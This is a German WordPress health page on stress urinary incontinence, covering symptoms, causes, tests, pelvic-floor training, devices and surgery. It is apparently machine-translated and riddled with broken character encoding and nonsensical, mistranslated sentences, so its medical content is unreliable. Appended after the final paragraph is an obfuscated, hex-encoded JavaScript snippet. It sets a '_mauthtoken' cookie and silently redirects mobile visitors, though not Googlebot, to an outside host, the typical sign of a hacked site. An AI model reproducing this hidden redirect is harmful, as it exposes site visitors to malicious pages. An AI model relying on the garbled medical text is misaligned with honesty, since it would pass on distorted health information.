Krankheit

Stress-Inkontinenz

Stress-InkontinenzHarninkontinenz ist der unbeabsichtigte Verlust von Urin.A�Wie Husten, Niesen, Laufen oder Heben schwerer Lasten – -, die Druck (Stress) auf die Blase legt Stress-Inkontinenz ist durch eine physikalische Bewegung oder AktivitA�t aufgefordert werden.A�Stress-Inkontinenz ist nicht auf psychologischen Stress.

Stress-Inkontinenz ist auch anders aus Drang-Inkontinenz, die die unbeabsichtigte Verlust von Urin von der Blase Muskel Auftraggeber, in der Regel mit einem GefA?hl der Dringlichkeit verbunden verursacht wird.A�Stress-Inkontinenz ist sehr viel hA�ufiger bei Frauen als MA�nner.

Wenn Sie Stress-Inkontinenz haben, kA�nnen Sie fA?hlen sich peinlich berA?hrt, isolieren sich selbst, oder Ihre Arbeit und Sozialleben zu begrenzen, vor allem A?ben und FreizeitaktivitA�ten.Mit der Behandlung, werden Sie wahrscheinlich in der Lage, Stress-Inkontinenz zu verwalten und zu verbessern Ihre allgemeine Wohlbefinden.

Symptome

Wenn Sie Stress-Inkontinenz haben, kA�nnen Sie Harnverlust auftreten, wenn Sie:

  • Husten
  • Niesen
  • Lachen
  • Aufstehen
  • Heben Sie etwas Schweres
  • A?bung
  • Sexuelle Beziehungen

Sie kA�nnen nicht Inkontinenz erleben jedes Mal, wenn eines dieser Dinge zu tun, aber jeder DruckerhA�hungs AktivitA�t kann Sie anfA�lliger fA?r ungewollte Urinverlust, insbesondere dann, wenn die Blase voll ist.

Wenn zum Arzt

Sprechen Sie mit Ihrem Arzt, wenn Ihre Symptome der Belastungsinkontinenz mit der AktivitA�ten des tA�glichen Lebens, wie zum Beispiel Ihre Arbeit, Hobbys und soziale Leben beeintrA�chtigen.

Ursachen

Stress-Inkontinenz tritt auf, weil der verminderten Funktion in der Kontrolle A?ber die Blase Muskeln, die die Freisetzung von Urin zu regulieren.

Die Blase dehnt sich mit Urin fA?llt, aber ventilartige Muskeln in der HarnrA�hre – die kurze RA�hre, durch die Urin flieAYt, um Ihren KA�rper zu verlassen – in der Regel geschlossen bleiben, oder zusammengezogen und verhindert Harnverlust, bis Sie ein Bad zu erreichen.A�Ihre BlasenschlieAYmuskel, innerhalb der umgebenden Beckenbodenmuskulatur, unterstA?tzt Ihre Blase.A�Wenn die Muskeln schwA�chen kA�nnen Druck Harnverlust fA?hren, wie Sie springen oder laufen, zum Beispiel.

Ihre Blase kann nicht einmal das GefA?hl ungewA�hnlich voll, wenn Sie Harnverlust aufgrund von Stress-Inkontinenz haben.A�Alles, was Kraft auf die Bauch-und Beckenbodenmuskulatur ausA?bt – Niesen, BA?cken, Heben, vor Lachen – macht Druck auf die Blase.

Ihre BlasenschlieAYmuskel und Beckenbodenmuskulatur kann aufgrund der StA�rke zu verlieren:

  • Geburt.A�A�Bei Frauen kann schlechte Funktion der Beckenbodenmuskulatur oder des SchlieAYmuskels, weil der Gewebe-oder NervenschA�den bei der Anlieferung von einem Kind auftreten.A�Belastungsinkontinenz aus dieser SchA�den kA�nnen bald nach der Geburt beginnen oder Jahre spA�ter auftreten.
  • Prostata-Operation.A�A�Bei MA�nnern ist die hA�ufigste Faktor, der zu Inkontinenz betonen die chirurgische Entfernung der Prostata (Prostatektomie) zur Behandlung von Prostatakrebs.A�Da der SchlieAYmuskel liegt direkt unterhalb der Prostata und umgibt die HarnrA�hre, kann eine Prostatektomie in einem geschwA�chten SchlieAYmuskel fA?hren.

Beigetragen

Andere Faktoren, die Stress-Inkontinenz verschlimmern kA�nnen, gehA�ren:

  • Krankheiten, chronischer Husten oder Niesen verursachen
  • Fettleibigkeit
  • Rauchen, die hA�ufig Husten verursachen kA�nnen
  • A?bermA�AYigen Konsum von Koffein oder Alkohol
  • Hohe Auswirkung AktivitA�ten A?ber viele Jahre
  • Hormonmangel

Risikofaktoren

Faktoren, die das Risiko der Entwicklung von Stress-Inkontinenz zu erhA�hen sind:

  • Alter.A�A�Obwohl Stress-Inkontinenz ist nicht ein normaler Teil des Alterns, kA�rperliche VerA�nderungen mit dem Altern verbunden sind, wie die SchwA�chung der Muskeln, kann Sie anfA�lliger fA?r Stressinkontinenz.A�Allerdings kann gelegentlich Stressinkontinenz bei Frauen jeden Alters, darunter auch Frauen von College-Alter auftreten.
  • Art der Entbindung Lieferung.A�A�Eine verzA�gerte zweite Phase der Arbeit (wenn die Frau “geschoben”), sowie mehrere vaginalen Entbindungen, wird mit hA�heren Raten von der spA�teren Entwicklung von Stress-Inkontinenz verbunden.A�Viele dieser Frauen kA�nnen auch Zangengeburt schneller liefern ein gesundes Baby – Zangengeburt kann auch mit einem hA�heren Risiko der Stressinkontinenz assoziiert werden.
  • KA�rpergewicht.A�A�Menschen, die A?bergewichtig oder fettleibig sind, haben eine viel hA�here Gefahr der Stressinkontinenz.A�A?bergewicht erhA�ht den Druck auf den Bauch-und Beckenorgane.A�AnschlieAYend kann der Druck auf die Blase selbst ohne zusA�tzlichen Druck von Husten oder eine andere Kraft erhA�ht werden.A�Der Gewichtsverlust ist mit einer Verbesserung der Inkontinenz verbunden.
  • ZurA?ck Beckenchirurgie.A�A�Hysterektomie bei Frauen und insbesondere der Operation bei Prostatakrebs bei MA�nnern kann die Funktion und die UnterstA?tzung der Blase und HarnrA�hre zu A�ndern, so dass es viel eher fA?r eine Person zu Stress-Inkontinenz zu entwickeln.A�Dieser Effekt kann entweder sofort oder verzA�gert werden.

Komplikationen

Komplikationen bei der Stress-Inkontinenz kA�nnen sein:

  • PersA�nliche Not.A�A�Wenn Sie Stress-Inkontinenz mit Ihren AktivitA�ten des tA�glichen Lebens zu erleben, kA�nnen Sie fA?hlen sich verwirrt und beunruhigt durch die Bedingung.Es kann Ihre Arbeit, soziale AktivitA�ten, zwischenmenschliche Beziehungen und auch Ihre sexuellen Beziehungen zu stA�ren.A�Manche Menschen sind peinlich, dass sie Pads oder InkontinenzwA�sche benA�tigen.
  • . MischinkontinenzA�A�Mischinkontinenz ist A?blich und bedeutet, dass Sie sowohl die Stressinkontinenz und Dranginkontinenz – den Verlust von Urin aus einer unwillkA?rlichen Kontraktion der Blasenmuskulatur (A?beraktive Blase) resultieren.
  • Hautausschlag oder Hautreizungen.A�A�Haut, die sich stA�ndig in Kontakt mit Urin ist wahrscheinlich irritiert, Hals zu sein und kann brechen.A�Dies geschieht mit schwerer Inkontinenz, wenn Sie sich nicht an VorsichtsmaAYnahmen, wie die Verwendung von Dampfsperren oder Inkontinenzeinlagen.

Vorbereitung fA?r den Termin

Ihr Arzt kann einen Fragebogen zu verwenden, um eine vorlA�ufige Beurteilung von Stress-Inkontinenz Symptome zu machen.A�Sie kA�nnen auch aufgefordert, ein Blasentagebuch fA?r ein paar Tage halten.A�Dazu gehA�rt die Aufnahme, wenn, wie viel und welche Art von FlA?ssigkeiten Sie verbrauchen, sowie wann und wie viel Sie urinieren, einschlieAYlich Nacht-BlasenaktivitA�t, und wenn man Inkontinenz zu erleben.

Ihr Tagebuch kA�nnen Muster, die Ihr Arzt verstehen, Symptome und Faktoren identifizieren helfen, zeigen.A�Dies kann die Notwendigkeit invasiver Tests reduzieren.

FachprA?fung kann eine A?berweisung an einen Facharzt in Harnwege fA?r MA�nner und Frauen (Urologen) oder einem Spezialisten fA?r Erkrankungen der Harnwege bei Frauen (urogynecologist) erfordern.

Was Sie tun kA�nnen

Um das Beste aus Ihrem Besuch beim Arzt zu bekommen, im Voraus vorbereiten:

  • Machen Sie eine Liste aller Symptome bei Ihnen auftreten.A�A�FA?gen Sie, wenn Ihr Leckage auftritt.
  • Machen Sie eine Liste der Medikamente, KrA�uter oder Vitamin-ErgA�nzungen Sie.A�Einige over-the-counter-ErgA�nzungen kA�nnen die Harnwege reizen.A�Auch Dosen und wie oft Sie das Medikament nehmen.
  • Haben Sie ein Familienmitglied oder enger Freund begleiten Sie.A�Sie kA�nnen eine Menge von Informationen auf Ihren Besuch gegeben werden, und es kann schwierig sein, alles zu erinnern.
  • Nehmen Sie ein Notebook oder elektronisches GerA�t mit IhnenA�.A�A�Verwenden Sie es, um wichtige Informationen wA�hrend Ihres Besuchs beachten.
  • Bereiten Sie eine Liste von Fragen an Ihren Arzt.A�A�Listen Sie Ihre wichtigsten Fragen zuerst, falls die Zeit ablA�uft.

FA?r Harninkontinenz, einige grundlegende Fragen Sie Ihren Arzt fragen sind:

  • Wird mein Harninkontinenz noch schlimmer werden?
  • KA�nnte BeckenbodenA?bungen helfen?A�Wie mache ich sie?
  • Wie funktioniert mein Gewicht auf meine Erkrankung?
  • KA�nnten die Medikamente nehme ich mein Zustand verschlimmert werden?
  • Welche Tests kann ich die Ursache meiner Inkontinenz zu bestimmen?
  • Muss ich operiert werden mA?ssen?

ZA�gern Sie nicht, Fragen wA�hrend Ihres Termins jederzeit fragen.

Was Sie von Ihrem Arzt erwarten

Seien Sie bereit, Fragen von Ihrem Arzt beantworten.A�Fragen Sie Ihren Arzt, kA�nnte man fragen sind:

  • Wie oft haben Sie Urin austreten?
  • Wenn Sie Urin austreten, ist es ein paar Tropfen oder Ihre Kleidung durchnA�sst?
  • Gibt es Zeiten, wenn Sie wissen, dass Sie undicht?
  • Haben Sie Urin verlieren, wenn Sie trainieren?
  • Haben Sie wA�hrend der Nacht aufwachen, um zu urinieren?A�Wie oft?
  • Was ist Ihre typische tA�gliche FlA?ssigkeitsaufnahme?
  • Gibt es etwas scheinen Ihre Inkontinenz besser zu machen?A�Wie wA�re es noch schlimmer?
  • Was ist das lA�stige Aspekt des Problems mit Harninkontinenz?
  • Haben Sie auch Darmleckage?A�Wie oft?A�Was bedeutet das Darmleck halten Sie von der gerade?

Untersuchungen und Diagnostik

WA�hrend Ihres Besuchs sieht Ihr Arzt fA?r die Hinweise, die auch angeben kA�nnen Einflussfaktoren.A�Ihr Termin wird wahrscheinlich auch ein:

  • Krankengeschichte
  • Die kA�rperliche Untersuchung mit besonderem Schwerpunkt auf den Bauch und Genitalien
  • Urinprobe fA?r eine Infektion zu testen, Spuren von Blut oder anderen Anomalien
  • Kurze neurologische Untersuchung, um alle Probleme zu identifizieren Beckennerven
  • Urinary Stresstest, in dem der Arzt fest, Harnverlust beim Husten oder unten tragen

Spezielle Tests

Ihr Arzt kA�nnte urodynamische Tests, die verwendet werden, um die Funktion der Blase beurteilen bestellen.A�Die PrA?fung ist nicht nA�tig bei den meisten Frauen mit unkomplizierter Belastungsinkontinenz oder diejenigen, die nicht vor der Operation, Becken-Strahlung, RA?ckenmarkserkrankungen oder fortgeschrittenen Diabetes haben.A�Tests kA�nnen umfassen:

  • Messungen der postleeren restlichen Urin.A�A�Wenn es Bedenken A?ber die FA�higkeit, die Blase vollstA�ndig zu entleeren, besonders wenn Sie A�lter sind, haben vor Blasenoperation hatte oder Diabetes haben, kann ein Test der Blase Effizienz benA�tigt werden.A�Um Restharn messen, nachdem Sie storniert haben, wird ein dA?nner Schlauch (Katheter) durch die HarnrA�hre in die Blase geleitet.A�Der Katheter entleert die restlichen Urin, der dann gemessen werden kann.A�Oder ein Spezialist kann eine Ultraschalluntersuchung zu verwenden, die Schallwellen in einem Bild Ihrer Blase und ihre Inhalte A?bersetzt.
  • Messblasendruck.A�A�Manche Menschen, besonders wenn sie eine neurologische Erkrankung des RA?ckenmarks hatte, mA?ssen Zystometrie.A�Zystometrie MaAYnahmen Druck in der Blase und in der Region wA�hrend der BlasenfA?llung.A�Ein Katheter wird verwendet, um die Blase langsam mit warmen FlA?ssigkeit fA?llen.A�Tests der Harnabgang wA�hrend der FA?llung getan, um fA?r die Stress-Inkontinenz zu A?berprA?fen.A�Dieses Verfahren kann mit einer Druck-Fluss-Studie, die sagt, wie viel Druck die Blase hat, um vollstA�ndig zu entleeren ausA?ben kombiniert werden.
  • Erstellen von Bildern der Blase, wie es funktioniert.A�A�Video Urodynamik Bildgebung verwendet, um Bilder von Ihrer Blase zu schaffen, wie es das BefA?llen und Entleeren.A�Mit einem Farbstoff, das zeigt, auf RA�ntgenstrahlen gemischt warme FlA?ssigkeit nach und nach in die Blase durch einen Katheter eingeimpft, wA�hrend die Bilder aufgezeichnet.Wenn die Blase voll ist, geht die Bildgebung, wie Sie urinieren, Ihre Blase zu entleeren.
  • Zystoskopie.A�A�Dies ist eine Untersuchung der Blase und HarnrA�hre mit einem Umfang in die Blase eingefA?hrt.A�Dieses Verfahren wird A?blicherweise im BA?ro abgeschlossen.

Sie und Ihr Arzt sollten die Ergebnisse von Tests zu diskutieren und entscheiden, wie sie Einfluss auf Ihre Behandlungsstrategie.

Behandlungen und Medikamente

Ihr Arzt wird wahrscheinlich empfehlen, eine Kombination von Behandlungsstrategien zu beenden oder die Anzahl der Inkontinenzepisoden zu verringern.A�Wenn eine zugrunde liegende Ursache oder Faktor, wie eine Infektion der Harnwege, identifiziert wird, erhalten Sie auch Behandlungen fA?r diese Bedingungen.

Verhaltenstherapien

Verhaltenstherapien kA�nnen helfen, die Beseitigung oder Minderung der Stressinkontinenz-Episoden.A�Die Behandlungen Ihr Arzt empfiehlt kA�nnen gehA�ren:

  • Beckenbodentraining.A�A�Kegel-A?bungen sind der wichtigste Teil der PrA�vention und Behandlung von Harninkontinenz.A�Diese A?bungen stA�rken Sie Ihre Beckenbodenmuskulatur und BlasenschlieAYmuskel.A�Ihr Arzt oder Physiotherapeut kann Ihnen helfen, zu lernen, wie man sie richtig zu tun.A�Genau wie jede andere Routine-A?bung, wie gut Kegel-A?bungen fA?r Sie arbeiten, hA�ngt davon ab, ob man sie regelmA�AYig durchzufA?hren.
  • Fluidverbrauch.A�A�Ihr Arzt kann die Menge und den Zeitpunkt der FlA?ssigkeitsverbrauch wA�hrend des Tages empfehlen.A�Sie kA�nnen aufgefordert werden, koffeinhaltige und alkoholische GetrA�nke zu vermeiden, um zu bestimmen, ob diese Nahrungsreizstoffe auf Ihre Blasenfunktion.A�Wenn Ihr Leckage wird maAYgeblich durch FluidplA�ne verbessert und die Vermeidung von Nahrungsreizstoffe, Sie haben zu entscheiden, ob, wenn Sie Ihre FlA?ssigkeitsaufnahme oder Verzicht auf Kaffee ist die Verbesserung der Leckage wert.
  • Gesunde Lebensweise A�ndert.A�A�Rauchen, ungesunde Gewicht zu verlieren oder die Behandlung einer chronischen Husten wird das Risiko von Stress-Inkontinenz zu verringern sowie die Verbesserung Ihrer Symptome.
  • Geplante AusflA?ge Toilette.A�A�Ihr Arzt kA�nnte einen Zeitplan fA?r den Toilettengang (Blasentraining), wenn Sie Inkontinenz gemischt, vor.A�Weitere hA�ufige Blasenentleerung kann die Anzahl oder die Schwere der Dranginkontinenz-Episoden zu reduzieren.

GerA�te

Bestimmte GerA�te fA?r Frauen kann die Steuerbelastungsinkontinenz helfen, einschlieAYlich:

  • Vaginal Pessar.A�A�Eine spezialisierte Harninkontinenz Pessar, wie ein Ring mit zwei Beulen, die auf jeder Seite der HarnrA�hre sitzen fA�rmig, eingebaut ist und durch Ihren Arzt oder eine Krankenschwester in Platz gesetzt.A�Es hilft, unterstA?tzt Ihre Blase Basis, um Harnverlust wA�hrend der AktivitA�t zu verhindern, vor allem, wenn die Blase hat (Vorfall) gesunken.A�Dies ist eine gute Wahl, wenn Sie eine Operation zu vermeiden mA�chten.A�Ein Pessar wird Routine Entfernung und Reinigung.
  • HarnrA�hreneinsA�tze.A�A�Dieses kleine Tampon artige Einwegvorrichtung in die HarnrA�hre eingefA?hrt als eine Barriere wirkt, um eine Leckage zu verhindern.A�Es ist in der Regel verwendet, um Inkontinenz bei einer spezifischen AktivitA�t zu verhindern, aber es kann den ganzen Tag getragen werden.A�HarnrA�hren-EinsA�tze sollen nicht getragen werden, 24 Stunden am Tag.

Chirurgie

Chirurgische Eingriffe zur Behandlung von Stressinkontinenz sind entworfen, um das SchlieAYen des SchlieAYmuskels verbessern oder unterstA?tzen den Blasenhals.A�Chirurgische Optionen sind:

  • Injizierbare FA?llstoffe.A�A�Synthetische Polysaccharide oder Gele kA�nnen in das Gewebe rund um den oberen Abschnitt der HarnrA�hre injiziert werden.A�Diese Materialien bulk den Bereich um die HarnrA�hre, die Verbesserung der SchlieAYfA�higkeit des SchlieAYmuskels.A�Da dieser Eingriff ist relativ nicht-invasive, kann es sinnvoll sein, vor anderen chirurgischen Optionen zu prA?fen.A�Es ist jedoch keine dauerhafte Reparatur.
  • Retropubische colposuspension.A�A�Dieses chirurgische Verfahren – laparoskopisch oder durch Bauchschnitt vorgenommen – verwendet NA�hte entweder BA�nder oder Knochen befestigt zu heben und StA?tzgewebe in der NA�he des Blasenhalses und des oberen Teils der HarnrA�hre.A�Dies wird oft in Kombination mit anderen Verfahren eingesetzt, um Frauen mit Stressinkontinenz, die auch eine Blase, die nach unten gefallen ist (vorgefallene) zu behandeln.
  • Schlingenverfahren.A�A�Dies ist die hA�ufigste Verfahren bei Frauen mit Belastungsinkontinenz durchgefA?hrt.A�In diesem Verfahren verwendet der Chirurg die Person das eigene Gewebe, Kunststoff (mesh), oder von tierischen oder Spendergewebe, um eine Schlinge oder HA�ngematte, die die HarnrA�hre unterstA?tzt erstellen.A�Slings sind auch fA?r MA�nner mit sphincteric Leckage verwendet.A�Die Technik nutzt ein Mesh-Tragetuch und kann die Symptome von Stressinkontinenz bei einigen MA�nnern zu erleichtern.
  • Aufblasbare kA?nstlichen SchlieAYmuskels.A�A�Dieses chirurgisch implantierten GerA�t wird hA�ufiger benutzt, um MA�nner zu behandeln.A�Eine Manschette, die um den oberen Abschnitt der HarnrA�hre paAYt, ersetzt die Funktion des SchlieAYmuskels.A�Rohre verbinden die Manschette auf einen Druck-Regelballon im Bereich des Beckens und einer manuell betriebenen Pumpe im Hodensack.A�WA�hrend nur selten in den USA bei Frauen verwendet wird, wenn das GerA�t in einer Frau implantiert ist, ist in den Schamlippen der Pumpe.

Lifestyle und Hausmittel

Gesunde Lebensweise Praktiken kA�nnen einen langen Weg zur Lockerung der Symptome der Belastungsinkontinenz zu gehen.

  • Shed zusA�tzliches Gewicht.A�A�Wenn Sie A?bergewichtig sind – Ihr Body-Mass-Index (BMI) von 25 oder hA�her – A?berflA?ssige Pfunde zu verlieren, kann helfen, den gesamten Druck auf die Blase und Beckenbodenmuskulatur zu reduzieren.A�Moderate Gewichtsverlust kann deutlich zur Verbesserung Ihrer Stress-Inkontinenz.A�Sprechen Sie mit Ihrem Arzt fA?r die Leitlinien fA?r die Gewichtsabnahme.
  • In Faser auf Ihre ErnA�hrung.A�A�Wenn chronische Verstopfung trA�gt zu Ihrem Harninkontinenz, halten Sie Ihre Stuhlgang weich und regelmA�AYig reduziert die Belastung, die auf Ihre Beckenbodenmuskulatur gesetzt wird.A�Essen Sie ballaststoffreiche Lebensmittel – Vollkornprodukte, HA?lsenfrA?chte, Obst und GemA?se – zu lindern und verhindern Verstopfung.
  • Vermeiden Sie das Essen oder Trinken Substanzen, die Ihre Blase reizen kA�nnen.A�Wenn Sie Mischinkontinenz und Sie wissen, dass das Trinken von Kaffee oder Tee (regelmA�AYige oder koffeinfrei) den ganzen Tag neigt dazu, Sie urinieren und Leck hA�ufiger, versuchen zu stoppen, dass die GetrA�nke, vor allem an den Tagen Sie wirklich nicht wollen, um durch Leck belA�stigt werden.
  • Rauchen Sie nicht.A�A�Rauchen kann zu einer schweren chronischen Husten fA?hren, die die Symptome der Belastungsinkontinenz verschlimmern kann.A�Rauchen ist auch mit einem RA?ckgang in der SauerstofftransportkapazitA�t, ein Faktor, gedacht, um das Risiko einer A?beraktiven Blase zu erhA�hen verbunden.A�Und Rauchen ist mit Blasenkrebs in Verbindung.

Der Umgang und die UnterstA?tzung

Behandlungen fA?r Stress-Inkontinenz kann in der Regel wesentlich reduzieren, wenn nicht zu beseitigen, Harninkontinenz und Ihnen helfen, die Kontrolle A?ber die Blase wieder zu erlangen.Die Dranginkontinenz Komponente der Mischinkontinenz kann sehr schwierig zu behandeln, und Sie UnterstA?tzung benA�tigen.

Ausgehen und A?ber

Die Aufrechterhaltung Ihre Verbindung mit Familie, Freunden und Kollegen kann GefA?hle von Isolation und Depression, die Inkontinenz begleiten kann verhindern.A�Vorbereitet kann Ihnen helfen, fA?hlen sich wohler, wenn Sie unterwegs sind:

  • Tanken Sie Versorgung.A�A�Nehmen Sie an ausreichend Inkontinenzeinlagen oder Schutz UnterwA�sche und mA�glicherweise eine A�nderung der Kleidung.A�Inkontinenz-Produkte sind diskret und oft in einem gerA�umigen Handtasche oder einen kleinen Rucksack verstaut werden.A�ZusA�tzliche Lieferungen und Ersatzkleidung kann in den Kofferraum Ihres Autos oder einem Rucksack fA?r den Einsatz, wenn nA�tig gehalten werden.
  • Auszukundschaften Ihr Ziel.A�A�Machen Sie sich mit den am Zielort verfA?gbar Toiletten.WA�hlen SitzplA�tze, die einfachen Zugang zu Toiletten ermA�glicht.
  • Passen Sie gut auf Ihre Haut.A�A�LA�ngerer Kontakt mit nasser Kleidung kann zu Hautreizungen oder Wunden verursachen.A�Halten Sie Ihre Haut trocken, indem Sie Ihre KleidungsstA?cke, wenn sie nass sind und Anlegen einer Schutzcreme, wenn Ihre Haut ist hA�ufig nass.

SexualitA�t und Inkontinenz

Undichte Urin wA�hrend des Geschlechtsverkehrs kA�nnen aufwA?hlend sein, aber es muss nicht unbedingt in der Art von IntimitA�t und Freude zu erhalten:

  • Sprechen Sie mit Ihrem Partner.A�A�So schwierig dies zunA�chst, sei offen mit Ihrem Partner A?ber Ihre Symptome.A�VerstA�ndnis und die Bereitschaft, Ihre BedA?rfnisse eines Partners kA�nnen Sie Ihre Symptome viel einfacher zu handhaben.
  • Leeren Sie Ihre Blase vorher.A�A�Um Ihre Chancen zu einer Leckage zu reduzieren, zu vermeiden TrinkflA?ssigkeiten fA?r eine Stunde oder so vor dem Sex und entleeren Sie Ihre Blase vor IntimitA�t beginnt.
  • Probieren Sie eine andere Position.A�A�A�ndern Positionen kA�nnen zu Leckagen fA?r Sie weniger wahrscheinlich.A�FA?r Frauen, an der Spitze der Regel gibt bessere Kontrolle der Beckenbodenmuskulatur.
  • Haben Ihre Kegels.A�A�BeckenbodenmuskelA?bungen (Kegel-A?bungen) stA�rken Sie Ihre Beckenbodenmuskulatur und reduzieren Harnverlust.
  • Seien Sie vorbereitet.A�A�gestA?tzt HandtA?cher Handy oder mit Einweg-Pads auf dem Bett kann helfen, zu lindern Ihre Sorge um Leckagen und enthalten keine Leckage.

Suchen Sie Hilfe

Als inkontinent ist nie die Norm, wA�hrend Sie altern.A�Behandlungen sind in der Regel, um die Auswirkungen der Inkontinenz auf Ihr Leben deutlich zu reduzieren.A�Belastungsinkontinenz kann oft geheilt werden.

Finden Sie einen Arzt, der bereit ist, mit Ihnen zu arbeiten, um den besten Weg zu Ihrem Inkontinenz zu bestimmen ist.A�Die Wahl der richtigen Behandlungen fA?r Sie sollte eine Partnerschaft sein.A�Wenn der erste Arzt nicht wollen, um die Vor-und Nachteile dieser vielen MA�glichkeiten mit Ihnen zu diskutieren, finden einen anderen, der will.

Sie sollten erwA�gen, sich einer Selbsthilfegruppe.A�Organisationen wie die National Association for Continence kA�nnen Sie mit Ressourcen und Informationen A?ber Menschen, die Stress-Inkontinenz Erlebnis zu bieten.A�Selbsthilfegruppen bieten die MA�glichkeit, Bedenken zu A�uAYern und bieten oft Motivation, Self-Care-Strategien zu erhalten.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Powered by: Wordpress